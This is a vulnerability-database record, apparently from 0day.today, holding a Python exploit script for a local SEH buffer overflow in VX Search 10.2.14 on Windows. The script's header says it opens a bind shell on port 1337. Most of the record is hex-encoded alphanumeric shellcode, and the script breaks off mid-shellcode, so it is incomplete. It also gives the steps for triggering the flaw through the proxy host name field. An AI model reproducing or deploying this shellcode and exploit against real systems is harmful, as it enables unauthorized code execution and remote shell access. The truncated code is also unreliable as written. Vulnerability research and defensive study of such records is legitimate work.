VX Search 10.2.14 - Proxy Buffer Overflow (SEH) Exploit

2017-11-17T00:00:00

Description

Exploit for windows platform in category local exploits

{"id": "1337DAY-ID-29014", "type": "zdt", "bulletinFamily": "exploit", "title": "VX Search 10.2.14 - Proxy Buffer Overflow (SEH) Exploit", "description": "Exploit for windows platform in category local exploits", "published": "2017-11-17T00:00:00", "modified": "2017-11-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/29014", "reporter": "wetw0rk", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-09T17:20:28", "viewCount": 10, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://0day.today/exploit/29014", "sourceData": "#!/usr/bin/env python\r\n#\r\n# Exploit Title : VXSearch v10.2.14 Local SEH Overflow\r\n# Date : 11/16/2017\r\n# Exploit Author : wetw0rk\r\n# Vendor Homepage : http://www.flexense.com/\r\n# Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe\r\n# Version : 10.2.14\r\n# Tested on : Windows 7 (x86)\r\n# Description : VX Search v10.2.14 suffers from a local buffer overflow. The\r\n# following exploit will generate a bind shell on port 1337. I\r\n# was unable to get a shell working with msfvenom shellcode so\r\n# below is a custom alphanumeric bind shell. Greetz rezkon ;)\r\n#\r\n# trigger the vulnerability by :\r\n# Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name\r\n#\r\n \r\nimport struct\r\n \r\nshellcode = \"w00tw00t\"\r\nshellcode += (\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\" # and eax, 0x554e4d4a\r\n\"\\x25\\x35\\x32\\x31\\x2a\" # and eax, 0x2a313235\r\n\"\\x2d\\x6a\\x35\\x35\\x35\" # sub eax, 0x3535356a\r\n\"\\x2d\\x65\\x6a\\x6a\\x65\" # sub eax, 0x656a6a65\r\n\"\\x2d\\x61\\x64\\x4d\\x65\" # sub eax, 0x654d6461\r\n\"\\x50\" # push eax\r\n\"\\x5c\" # pop esp\r\n)\r\nshellcode += (\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x4f\\x4f\\x4f\\x4f\"\r\n\"\\x2d\\x4f\\x30\\x4f\\x68\\x2d\\x62\\x2d\\x62\\x72\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x76\\x57\\x57\\x63\\x2d\\x77\\x36\\x39\"\r\n\"\\x32\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x41\\x54\"\r\n\"\\x54\\x54\\x2d\\x25\\x54\\x7a\\x2d\\x2d\\x25\\x52\\x76\\x36\\x50\\x25\\x4a\"\r\n\"\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x49\\x35\\x49\\x49\\x2d\\x49\"\r\n\"\\x25\\x49\\x69\\x2d\\x64\\x25\\x72\\x6c\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\"\r\n\"\\x35\\x32\\x31\\x2a\\x2d\\x70\\x33\\x33\\x25\\x2d\\x70\\x25\\x70\\x25\\x2d\"\r\n\"\\x4b\\x6a\\x56\\x39\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x79\\x55\\x75\\x32\\x2d\\x79\\x75\\x75\\x55\\x2d\\x79\\x77\\x77\\x78\"\r\n\"\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x25\\x4a\\x4a\"\r\n\"\\x25\\x2d\\x39\\x5f\\x4d\\x34\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\"\r\n\"\\x31\\x2a\\x2d\\x4b\\x57\\x4b\\x57\\x2d\\x70\\x76\\x4b\\x79\\x2d\\x70\\x76\"\r\n\"\\x78\\x79\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x49\"\r\n\"\\x49\\x49\\x49\\x2d\\x49\\x4e\\x64\\x49\\x2d\\x78\\x25\\x78\\x25\\x2d\\x6f\"\r\n\"\\x25\\x7a\\x48\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\"\r\n\"\\x58\\x58\\x38\\x58\\x2d\\x58\\x30\\x32\\x58\\x2d\\x51\\x46\\x2d\\x47\\x50\"\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x5f\\x52\\x5f\\x5f\"\r\n\"\\x2d\\x5f\\x25\\x25\\x35\\x2d\\x62\\x39\\x25\\x25\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x4a\\x4a\\x4a\\x4a\\x2d\\x4a\\x4a\\x4a\"\r\n\"\\x4a\\x2d\\x79\\x39\\x4a\\x79\\x2d\\x6d\\x32\\x4b\\x68\\x50\\x25\\x4a\\x4d\"\r\n\"\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x30\\x30\\x71\\x30\\x2d\\x30\\x25\"\r\n\"\\x71\\x30\\x2d\\x38\\x31\\x51\\x5f\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\"\r\n\"\\x32\\x31\\x2a\\x2d\\x32\\x32\\x32\\x32\\x2d\\x78\\x77\\x7a\\x77\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x62\\x62\\x62\\x62\\x2d\"\r\n\"\\x48\\x57\\x47\\x4f\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x76\\x76\\x4f\\x4f\\x2d\\x36\\x39\\x5a\\x5a\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x61\\x61\\x61\\x61\\x2d\\x4a\\x61\\x4a\"\r\n\"\\x25\\x2d\\x45\\x77\\x53\\x35\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\"\r\n\"\\x31\\x2a\\x2d\\x63\\x63\\x63\\x63\\x2d\\x39\\x63\\x63\\x2d\\x2d\\x32\\x63\"\r\n\"\\x7a\\x25\\x2d\\x31\\x49\\x7a\\x25\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\"\r\n\"\\x32\\x31\\x2a\\x2d\\x72\\x79\\x79\\x79\\x2d\\x25\\x30\\x25\\x30\\x2d\\x25\"\r\n\"\\x32\\x25\\x55\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\"\r\n\"\\x58\\x58\\x41\\x58\\x2d\\x58\\x58\\x25\\x77\\x2d\\x6e\\x51\\x32\\x69\\x50\"\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x48\\x77\\x38\\x48\"\r\n\"\\x2d\\x4e\\x76\\x6e\\x61\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\"\r\n\"\\x2a\\x2d\\x41\\x41\\x6e\\x6e\\x2d\\x31\\x31\\x30\\x6e\\x2d\\x37\\x36\\x30\"\r\n\"\\x2d\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x38\\x38\"\r\n\"\\x38\\x38\\x2d\\x38\\x79\\x38\\x25\\x2d\\x38\\x79\\x38\\x25\\x2d\\x58\\x4c\"\r\n\"\\x73\\x25\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x61\"\r\n\"\\x52\\x61\\x52\\x2d\\x37\\x4a\\x31\\x49\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\"\r\n\"\\x35\\x32\\x31\\x2a\\x2d\\x4d\\x47\\x4d\\x4d\\x2d\\x30\\x25\\x4d\\x6b\\x2d\"\r\n\"\\x36\\x32\\x66\\x71\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x36\\x43\\x43\\x6c\\x2d\\x33\\x54\\x47\\x25\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x4c\\x4c\\x4c\\x4c\\x2d\\x6e\\x4c\\x6e\"\r\n\"\\x36\\x2d\\x65\\x67\\x6f\\x25\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\"\r\n\"\\x31\\x2a\\x2d\\x25\\x25\\x4b\\x4b\\x2d\\x25\\x25\\x6f\\x4b\\x2d\\x4e\\x41\"\r\n\"\\x59\\x2d\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x41\"\r\n\"\\x41\\x41\\x41\\x2d\\x52\\x52\\x78\\x41\\x2d\\x6e\\x6c\\x70\\x25\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x30\\x6c\\x30\\x30\\x2d\"\r\n\"\\x30\\x6c\\x6c\\x30\\x2d\\x38\\x70\\x79\\x66\\x50\\x25\\x4a\\x4d\\x4e\\x55\"\r\n\"\\x25\\x35\\x32\\x31\\x2a\\x2d\\x42\\x70\\x70\\x45\\x2d\\x32\\x45\\x70\\x31\"\r\n\"\\x2d\\x25\\x4b\\x49\\x31\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\"\r\n\"\\x2a\\x2d\\x25\\x50\\x50\\x50\\x2d\\x25\\x7a\\x72\\x25\\x2d\\x4e\\x73\\x61\"\r\n\"\\x52\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x35\\x77\"\r\n\"\\x74\\x74\\x2d\\x61\\x78\\x35\\x34\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\"\r\n\"\\x32\\x31\\x2a\\x2d\\x30\\x30\\x30\\x30\\x2d\\x30\\x30\\x59\\x30\\x2d\\x30\"\r\n\"\\x30\\x74\\x51\\x2d\\x6b\\x36\\x79\\x67\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\"\r\n\"\\x35\\x32\\x31\\x2a\\x2d\\x75\\x38\\x43\\x43\\x2d\\x7a\\x31\\x43\\x43\\x2d\"\r\n\"\\x7a\\x2d\\x77\\x79\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x59\\x59\\x59\\x59\\x2d\\x59\\x59\\x59\\x59\\x2d\\x6f\\x6c\\x4d\\x77\"\r\n\"\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x45\\x45\\x45\"\r\n\"\\x45\\x2d\\x34\\x2d\\x76\\x45\\x2d\\x37\\x25\\x5a\\x65\\x50\\x25\\x4a\\x4d\"\r\n\"\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x34\\x34\\x34\\x34\\x2d\\x62\\x34\"\r\n\"\\x34\\x34\\x2d\\x6d\\x56\\x47\\x57\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\"\r\n\"\\x32\\x31\\x2a\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x76\\x2d\\x2d\\x76\\x2d\\x55\"\r\n\"\\x4c\\x55\\x7a\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\"\r\n\"\\x77\\x77\\x77\\x30\\x2d\\x47\\x47\\x79\\x30\\x2d\\x42\\x42\\x39\\x34\\x50\"\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x56\\x75\\x36\\x51\"\r\n\"\\x2d\\x42\\x61\\x49\\x43\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\"\r\n\"\\x2a\\x2d\\x56\\x56\\x31\\x56\\x2d\\x31\\x79\\x31\\x25\\x2d\\x50\\x6c\\x48\"\r\n\"\\x34\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x72\\x72\"\r\n\"\\x72\\x72\\x2d\\x72\\x25\\x38\\x38\\x2d\\x38\\x25\\x25\\x25\\x2d\\x54\\x41\"\r\n\"\\x30\\x30\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x47\"\r\n\"\\x47\\x47\\x76\\x2d\\x47\\x47\\x76\\x76\\x2d\\x6b\\x72\\x6c\\x5a\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x25\\x71\\x25\\x71\\x2d\"\r\n\"\\x73\\x42\\x63\\x68\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x48\\x55\\x51\\x51\\x2d\\x45\\x78\\x4f\\x5a\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x45\\x45\\x45\\x32\\x2d\\x45\\x45\\x25\"\r\n\"\\x31\\x2d\\x76\\x75\\x2d\\x25\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\"\r\n\"\\x31\\x2a\\x2d\\x6e\\x4f\\x6d\\x6e\\x2d\\x35\\x48\\x5f\\x5f\\x50\\x25\\x4a\"\r\n\"\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x71\"\r\n\"\\x2d\\x2d\\x71\\x2d\\x71\\x2d\\x4a\\x71\\x2d\\x66\\x65\\x70\\x62\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x56\\x30\\x56\\x30\\x2d\"\r\n\"\\x56\\x38\\x25\\x30\\x2d\\x74\\x37\\x25\\x45\\x50\\x25\\x4a\\x4d\\x4e\\x55\"\r\n\"\\x25\\x35\\x32\\x31\\x2a\\x2d\\x32\\x32\\x32\\x77\\x2d\\x32\\x32\\x32\\x32\"\r\n\"\\x2d\\x43\\x41\\x4a\\x57\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\"\r\n\"\\x2a\\x2d\\x63\\x63\\x63\\x30\\x2d\\x79\\x41\\x41\\x6e\\x50\\x25\\x4a\\x4d\"\r\n\"\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x4b\\x4b\\x4b\\x4b\\x2d\\x4b\\x4b\"\r\n\"\\x25\\x31\\x2d\\x4b\\x71\\x25\\x32\\x2d\\x4f\\x6e\\x25\\x2d\\x50\\x25\\x4a\"\r\n\"\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x37\\x37\\x37\\x37\\x2d\\x6d\"\r\n\"\\x37\\x6d\\x37\\x2d\\x6d\\x37\\x6d\\x37\\x2d\\x64\\x55\\x63\\x58\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x44\\x6c\\x6c\\x6c\\x2d\"\r\n\"\\x34\\x44\\x44\\x6c\\x2d\\x30\\x33\\x4e\\x54\\x50\\x25\\x4a\\x4d\\x4e\\x55\"\r\n\"\\x25\\x35\\x32\\x31\\x2a\\x2d\\x2d\\x7a\\x43\\x2d\\x2d\\x48\\x79\\x71\\x47\"\r\n\"\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x41\\x41\\x41\"\r\n\"\\x41\\x2d\\x41\\x46\\x71\\x25\\x2d\\x5a\\x77\\x7a\\x32\\x50\\x25\\x4a\\x4d\"\r\n\"\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x47\\x47\\x47\\x47\\x2d\\x47\\x6e\"\r\n\"\\x47\\x6e\\x2d\\x47\\x78\\x6e\\x78\\x2d\\x47\\x79\\x77\\x79\\x50\\x25\\x4a\"\r\n\"\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x74\\x38\\x69\\x38\\x2d\\x51\"\n\n# 0day.today [2018-01-09] #", "_state": {"dependencies": 1647589307, "score": 1659729680}}